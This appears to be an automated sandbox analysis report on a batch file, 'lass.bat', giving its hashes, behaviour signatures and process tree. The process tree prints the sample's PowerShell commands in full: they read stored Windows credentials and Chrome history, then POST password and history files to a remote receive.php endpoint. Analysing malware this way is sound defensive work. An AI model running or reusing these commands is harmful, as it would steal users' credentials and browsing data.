Analysis
-
max time kernel
117s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
11/10/2023, 09:58
Static task
static1
Behavioral task
behavioral1
Sample
lass.bat
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
lass.bat
Resource
win10v2004-20230915-en
General
-
Target
lass.bat
-
Size
2KB
-
MD5
98b3b2ad7becd3d4a0395f566c4c8e2d
-
SHA1
063f55768afd8fa7625ea3868f96d3e0276b046b
-
SHA256
001963387c6237e750cc8af0d3a1c50175c0b31661650ee6c38a715d1086ec00
-
SHA512
dcd80c59f94e4681725f40def6fa769ed999241419a1a1ae186e9ab9ec5d90fd4092ecad54f14c9cc2a071371003888ec7a9fd67e01af9219df7fdaa4279578f
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2096 powershell.exe 2668 powershell.exe 2568 powershell.exe 3004 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2096 powershell.exe Token: SeDebugPrivilege 2668 powershell.exe Token: SeDebugPrivilege 2568 powershell.exe Token: SeDebugPrivilege 3004 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 1936 wrote to memory of 2496 1936 cmd.exe 29 PID 1936 wrote to memory of 2496 1936 cmd.exe 29 PID 1936 wrote to memory of 2496 1936 cmd.exe 29 PID 1936 wrote to memory of 2096 1936 cmd.exe 30 PID 1936 wrote to memory of 2096 1936 cmd.exe 30 PID 1936 wrote to memory of 2096 1936 cmd.exe 30 PID 1936 wrote to memory of 2668 1936 cmd.exe 31 PID 1936 wrote to memory of 2668 1936 cmd.exe 31 PID 1936 wrote to memory of 2668 1936 cmd.exe 31 PID 1936 wrote to memory of 2568 1936 cmd.exe 32 PID 1936 wrote to memory of 2568 1936 cmd.exe 32 PID 1936 wrote to memory of 2568 1936 cmd.exe 32 PID 1936 wrote to memory of 3004 1936 cmd.exe 33 PID 1936 wrote to memory of 3004 1936 cmd.exe 33 PID 1936 wrote to memory of 3004 1936 cmd.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\lass.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\system32\mode.commode con cols=800 lines=1002⤵PID:2496
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-Content $env:APPDATA\Microsoft\Credentials\*.CREDENTIAL | ForEach-Object { $_ | ConvertTo-Json }"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-Content $env:APPDATA\..\Local\Google\Chrome\User Data\Default\History | ForEach-Object { $_ | ConvertTo-Json }"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-RestMethod -Uri 'http://192.168.0.1/receive.php' -Method POST -InFile 'passwords.txt'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-RestMethod -Uri 'http://192.168.0.1/receive.php' -Method POST -InFile 'history.txt'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD53afaaabe3237a983458ea710df9aa57a
SHA1203ec113d09681a5e2cf82bf93cff084e718a17e
SHA256c1545875daf2560bf8405c2ea63a5f4525fc18511c36d1a9fd36503812bf7a3a
SHA512d4834b1c560a1649b728cc23d7dcc540cb90080611e44fb62ca15af9732be02e6834deab7e7a9e240c1eaae91bb3cec93c82dce6929e27cd730d5d2d8791ad15
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD53afaaabe3237a983458ea710df9aa57a
SHA1203ec113d09681a5e2cf82bf93cff084e718a17e
SHA256c1545875daf2560bf8405c2ea63a5f4525fc18511c36d1a9fd36503812bf7a3a
SHA512d4834b1c560a1649b728cc23d7dcc540cb90080611e44fb62ca15af9732be02e6834deab7e7a9e240c1eaae91bb3cec93c82dce6929e27cd730d5d2d8791ad15
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD53afaaabe3237a983458ea710df9aa57a
SHA1203ec113d09681a5e2cf82bf93cff084e718a17e
SHA256c1545875daf2560bf8405c2ea63a5f4525fc18511c36d1a9fd36503812bf7a3a
SHA512d4834b1c560a1649b728cc23d7dcc540cb90080611e44fb62ca15af9732be02e6834deab7e7a9e240c1eaae91bb3cec93c82dce6929e27cd730d5d2d8791ad15
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U3FCA5ZZVKPY6YCV66PD.temp
Filesize7KB
MD53afaaabe3237a983458ea710df9aa57a
SHA1203ec113d09681a5e2cf82bf93cff084e718a17e
SHA256c1545875daf2560bf8405c2ea63a5f4525fc18511c36d1a9fd36503812bf7a3a
SHA512d4834b1c560a1649b728cc23d7dcc540cb90080611e44fb62ca15af9732be02e6834deab7e7a9e240c1eaae91bb3cec93c82dce6929e27cd730d5d2d8791ad15